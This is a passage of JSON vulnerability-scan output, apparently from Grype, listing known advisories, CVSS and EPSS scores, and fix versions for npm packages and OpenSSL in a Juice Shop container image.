iterations.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":9.1,"exploitabilityScore":3.9,"impactScore":5.2},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":9.1,"exploitabilityScore":3.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2023-46233","epss":0.00635,"percentile":0.45497,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2023-46233","cwe":"CWE-328","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2023-46233","cwe":"CWE-916","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2023-46233","cwe":"CWE-327","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"crypto-js","version":"3.3.0"}},"found":{"vulnerabilityID":"GHSA-xwcq-pm8m-c4vf","versionConstraint":"<4.2.0 (semantic)"},"fix":{"suggestedVersion":"4.2.0"}}],"artifact":{"id":"pkg:npm/crypto-js@3.3.0?package-id=c00a8b8b043aae72","name":"crypto-js","version":"3.3.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/crypto-js/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:crypto-js:crypto-js:3.3.0:*:*:*:*:*:*:*","cpe:2.3:a:crypto-js:crypto_js:3.3.0:*:*:*:*:*:*:*","cpe:2.3:a:crypto_js:crypto-js:3.3.0:*:*:*:*:*:*:*","cpe:2.3:a:crypto_js:crypto_js:3.3.0:*:*:*:*:*:*:*","cpe:2.3:a:crypto:crypto-js:3.3.0:*:*:*:*:*:*:*","cpe:2.3:a:crypto:crypto_js:3.3.0:*:*:*:*:*:*:*","cpe:2.3:a:brix:crypto-js:3.3.0:*:*:*:*:*:*:*","cpe:2.3:a:brix:crypto_js:3.3.0:*:*:*:*:*:*:*"],"purl":"pkg:npm/crypto-js@3.3.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-8g4m-cjm2-96wq","dataSource":"https://github.com/advisories/GHSA-8g4m-cjm2-96wq","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23771","https://snyk.io/vuln/SNYK-JS-ARGENCODERSNOTEVIL-2388587","https://snyk.io/vuln/SNYK-JS-NOTEVIL-2385946"],"description":"Sandbox escape in notevil and argencoders-notevil","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N","metrics":{"baseScore":6.5,"exploitabilityScore":3.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2021-23771","epss":0.00997,"percentile":0.58079,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2021-23771","cwe":"CWE-1321","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0.5732749999999999},"relatedVulnerabilities":[{"id":"CVE-2021-23771","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2021-23771","namespace":"nvd:cpe","severity":"Medium","urls":["https://snyk.io/vuln/SNYK-JS-ARGENCODERSNOTEVIL-2388587","https://snyk.io/vuln/SNYK-JS-NOTEVIL-2385946"],"description":"This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object's prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878).","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N","metrics":{"baseScore":6.5,"exploitabilityScore":3.9,"impactScore":2.6},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:P/I:P/A:N","metrics":{"baseScore":6.4,"exploitabilityScore":10,"impactScore":5},"vendorMetadata":{}},{"source":"report@snyk.io","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N","metrics":{"baseScore":6.5,"exploitabilityScore":3.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2021-23771","epss":0.00997,"percentile":0.58079,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2021-23771","cwe":"CWE-1321","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"notevil","version":"1.3.3"}},"found":{"vulnerabilityID":"GHSA-8g4m-cjm2-96wq","versionConstraint":"<=1.3.3 (semantic)"}}],"artifact":{"id":"pkg:npm/notevil@1.3.3?package-id=06d4740823f7ae47","name":"notevil","version":"1.3.3","type":"npm","locations":[{"path":"/juice-shop/node_modules/notevil/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:notevil_project:notevil:1.3.3:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/notevil@1.3.3","upstreams":[]}},{"vulnerability":{"id":"GHSA-f5x3-32g6-xq36","dataSource":"https://github.com/advisories/GHSA-f5x3-32g6-xq36","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36","https://nvd.nist.gov/vuln/detail/CVE-2024-28863","https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7","https://security.netapp.com/advisory/ntap-20240524-0005"],"description":"Denial of service while parsing a tar file due to lack of folders count validation","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","metrics":{"baseScore":6.5,"exploitabilityScore":2.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-28863","epss":0.00929,"percentile":0.55815,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-28863","cwe":"CWE-400","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2024-28863","cwe":"CWE-770","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["6.2.1"],"state":"fixed","available":[{"version":"6.2.1","date":"2024-04-10","kind":"first-observed"}]},"advisories":[],"risk":0.534175},"relatedVulnerabilities":[{"id":"CVE-2024-28863","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2024-28863","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7","https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36","https://security.netapp.com/advisory/ntap-20240524-0005/"],"description":"node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within few seconds of running it using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction in excessively deep sub-folders.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","metrics":{"baseScore":6.5,"exploitabilityScore":2.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-28863","epss":0.00929,"percentile":0.55815,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-28863","cwe":"CWE-400","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2024-28863","cwe":"CWE-770","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"4.4.19"}},"found":{"vulnerabilityID":"GHSA-f5x3-32g6-xq36","versionConstraint":"<6.2.1 (semantic)"},"fix":{"suggestedVersion":"6.2.1"}}],"artifact":{"id":"pkg:npm/tar@4.4.19?package-id=f42c59d94c10b95d","name":"tar","version":"4.4.19","type":"npm","locations":[{"path":"/juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:4.4.19:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:4.4.19:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@4.4.19","upstreams":[]}},{"vulnerability":{"id":"GHSA-rm97-x556-q36h","dataSource":"https://github.com/advisories/GHSA-rm97-x556-q36h","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2024-21501","https://github.com/apostrophecms/sanitize-html/pull/650","https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4","https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf","https://github.com/apostrophecms/apostrophe/discussions/4436","https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334","https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EB5JPYRCTS64EA5AMV3INHDPI6I4AW7","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P4I5X6V3LYUNBMZ5YOW4BV427TH3IK4S"],"description":"sanitize-html Information Exposure vulnerability","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-21501","epss":0.01018,"percentile":0.58744,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-21501","cwe":"CWE-200","source":"report@snyk.io","type":"Secondary"},{"cve":"CVE-2024-21501","cwe":"CWE-538","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary"}],"fix":{"versions":["2.12.1"],"state":"fixed","available":[{"version":"2.12.1","date":"2024-03-02","kind":"first-observed"}]},"advisories":[],"risk":0.52427},"relatedVulnerabilities":[{"id":"CVE-2024-21501","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2024-21501","namespace":"nvd:cpe","severity":"Medium","urls":["https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf","https://github.com/apostrophecms/apostrophe/discussions/4436","https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4","https://github.com/apostrophecms/sanitize-html/pull/650","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EB5JPYRCTS64EA5AMV3INHDPI6I4AW7/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P4I5X6V3LYUNBMZ5YOW4BV427TH3IK4S/","https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557","https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334"],"description":"Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}},{"source":"report@snyk.io","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-21501","epss":0.01018,"percentile":0.58744,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-21501","cwe":"CWE-200","source":"report@snyk.io","type":"Secondary"},{"cve":"CVE-2024-21501","cwe":"CWE-538","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"sanitize-html","version":"1.4.2"}},"found":{"vulnerabilityID":"GHSA-rm97-x556-q36h","versionConstraint":"<2.12.1 (semantic)"},"fix":{"suggestedVersion":"2.12.1"}}],"artifact":{"id":"pkg:npm/sanitize-html@1.4.2?package-id=5de04e7baabe2ecd","name":"sanitize-html","version":"1.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:apostrophecms:sanitize-html:1.4.2:*:*:*:*:node.js:*:*","cpe:2.3:a:punkave:sanitize-html:1.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/sanitize-html@1.4.2","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-42764","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-42764","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Issue summary: Receiving a QUIC initial packet with an invalid token may trigger a NULL pointer dereference in the OpenSSL QUIC server with address validation disabled. Impact summary: NULL pointer dereference typically causes abnormal termination of the affected QUIC server process and a Denial of Service. If the address validation is disabled in the OpenSSL QUIC server implementation, an attacker can crash the server by sending an initial packet with an invalid or expired token. By default, the client address validation is enabled in the OpenSSL QUIC server implementation, which makes the default configuration not vulnerable to this issue. However if the SSL_LISTENER_FLAG_NO_VALIDATE is used with the SSL_new_listener() call, the address validation is disabled making the vulnerable code reachable. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42764","epss":0.00666,"percentile":0.46842,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42764","cwe":"CWE-476","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-10","kind":"first-observed"}]},"advisories":[],"risk":0.49950000000000006},"relatedVulnerabilities":[{"id":"CVE-2026-42764","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-42764","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/openssl/openssl/commit/5e3ed291b8af0b03d5d3b9e56a1da69a187e9729","https://github.com/openssl/openssl/commit/a45a0aba8095682c88ff4fc4a784892b8c6f0677","https://github.com/openssl/openssl/commit/bf29a458c1a231eca87e384c62b9c2553fa57a91","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: Receiving a QUIC initial packet with an invalid token may\ntrigger a NULL pointer dereference in the OpenSSL QUIC server with\naddress validation disabled.\n\nImpact summary: NULL pointer dereference typically causes abnormal termination\nof the affected QUIC server process and a Denial of Service.\n\nIf the address validation is disabled in the OpenSSL QUIC server\nimplementation, an attacker can crash the server by sending an initial\npacket with an invalid or expired token.\n\nBy default, the client address validation is enabled in the OpenSSL QUIC server\nimplementation, which makes the default configuration not vulnerable\nto this issue. However if the SSL_LISTENER_FLAG_NO_VALIDATE is used with\nthe SSL_new_listener() call, the address validation is disabled making the\nvulnerable code reachable.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42764","epss":0.00666,"percentile":0.46842,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42764","cwe":"CWE-476","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-42764","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-4pg4-qvpc-4q3h","dataSource":"https://github.com/advisories/GHSA-4pg4-qvpc-4q3h","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h","https://nvd.nist.gov/vuln/detail/CVE-2025-47944","https://github.com/expressjs/multer/issues/1176","https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665"],"description":"Multer vulnerable to Denial of Service from maliciously crafted requests","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-47944","epss":0.00665,"percentile":0.4677,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-47944","cwe":"CWE-248","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["2.0.0"],"state":"fixed","available":[{"version":"2.0.0","date":"2025-05-22","kind":"first-observed"}]},"advisories":[],"risk":0.49874999999999997},"relatedVulnerabilities":[{"id":"CVE-2025-47944","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2025-47944","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665","https://github.com/expressjs/multer/issues/1176","https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h"],"description":"Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-47944","epss":0.00665,"percentile":0.4677,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-47944","cwe":"CWE-248","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"multer","version":"1.4.5-lts.2"}},"found":{"vulnerabilityID":"GHSA-4pg4-qvpc-4q3h","versionConstraint":">=1.4.4-lts.1,<2.0.0 (semantic)"},"fix":{"suggestedVersion":"2.0.0"}}],"artifact":{"id":"pkg:npm/multer@1.4.5-lts.2?package-id=cce9b5dd2cb3fe54","name":"multer","version":"1.4.5-lts.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/multer/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/multer@1.4.5-lts.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-44fp-w29j-9vj5","dataSource":"https://github.com/advisories/GHSA-44fp-w29j-9vj5","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5","https://nvd.nist.gov/vuln/detail/CVE-2025-47935","https://github.com/expressjs/multer/pull/1120","https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665"],"description":"Multer vulnerable to Denial of Service via memory leaks from unclosed streams","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-47935","epss":0.00651,"percentile":0.46205,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-47935","cwe":"CWE-401","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["2.0.0"],"state":"fixed","available":[{"version":"2.0.0","date":"2025-05-22","kind":"first-observed"}]},"advisories":[],"risk":0.48824999999999996},"relatedVulnerabilities":[{"id":"CVE-2025-47935","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2025-47935","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665","https://github.com/expressjs/multer/pull/1120","https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5"],"description":"Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-47935","epss":0.00651,"percentile":0.46205,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-47935","cwe":"CWE-401","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"multer","version":"1.4.5-lts.2"}},"found":{"vulnerabilityID":"GHSA-44fp-w29j-9vj5","versionConstraint":"<2.0.0 (semantic)"},"fix":{"suggestedVersion":"2.0.0"}}],"artifact":{"id":"pkg:npm/multer@1.4.5-lts.2?package-id=cce9b5dd2cb3fe54","name":"multer","version":"1.4.5-lts.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/multer/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/multer@1.4.5-lts.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-3j7m-hmh3-9jmp","dataSource":"https://github.com/advisories/GHSA-3j7m-hmh3-9jmp","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2016-1000237","https://github.com/apostrophecms/sanitize-html/issues/29","https://github.com/apostrophecms/sanitize-html/commit/762fbc7bba389f3f789cc291c1eb2b64f60f2caf","https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000237.json","https://github.com/punkave/sanitize-html/issues/29","https://www.npmjs.com/advisories/135"],"description":"Cross-Site Scripting in sanitize-html","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","metrics":{"baseScore":6.1,"exploitabilityScore":2.9,"impactScore":2.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2016-1000237","epss":0.0084,"percentile":0.52948,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2016-1000237","cwe":"CWE-79","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["1.4.3"],"state":"fixed","available":[{"version":"1.4.3","date":"2020-07-28","kind":"first-observed"}]},"advisories":[],"risk":0.46619999999999995},"relatedVulnerabilities":[{"id":"CVE-2016-1000237","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2016-1000237","namespace":"nvd:cpe","severity":"Medium","urls":["https://nodesecurity.io/advisories/135","https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000237.json"],"description":"sanitize-html before 1.4.3 has XSS.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","metrics":{"baseScore":6.1,"exploitabilityScore":2.9,"impactScore":2.8},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:M/Au:N/C:N/I:P/A:N","metrics":{"baseScore":4.3,"exploitabilityScore":8.6,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2016-1000237","epss":0.0084,"percentile":0.52948,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2016-1000237","cwe":"CWE-79","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"sanitize-html","version":"1.4.2"}},"found":{"vulnerabilityID":"GHSA-3j7m-hmh3-9jmp","versionConstraint":"<1.4.3 (semantic)"},"fix":{"suggestedVersion":"1.4.3"}}],"artifact":{"id":"pkg:npm/sanitize-html@1.4.2?package-id=5de04e7baabe2ecd","name":"sanitize-html","version":"1.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:apostrophecms:sanitize-html:1.4.2:*:*:*:*:node.js:*:*","cpe:2.3:a:punkave:sanitize-html:1.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/sanitize-html@1.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-fjgf-rc76-4x9p","dataSource":"https://github.com/advisories/GHSA-fjgf-rc76-4x9p","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p","https://nvd.nist.gov/vuln/detail/CVE-2025-7338","https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b","https://cna.openjsf.org/security-advisories.html"],"description":"Multer vulnerable to Denial of Service via unhandled exception from malformed 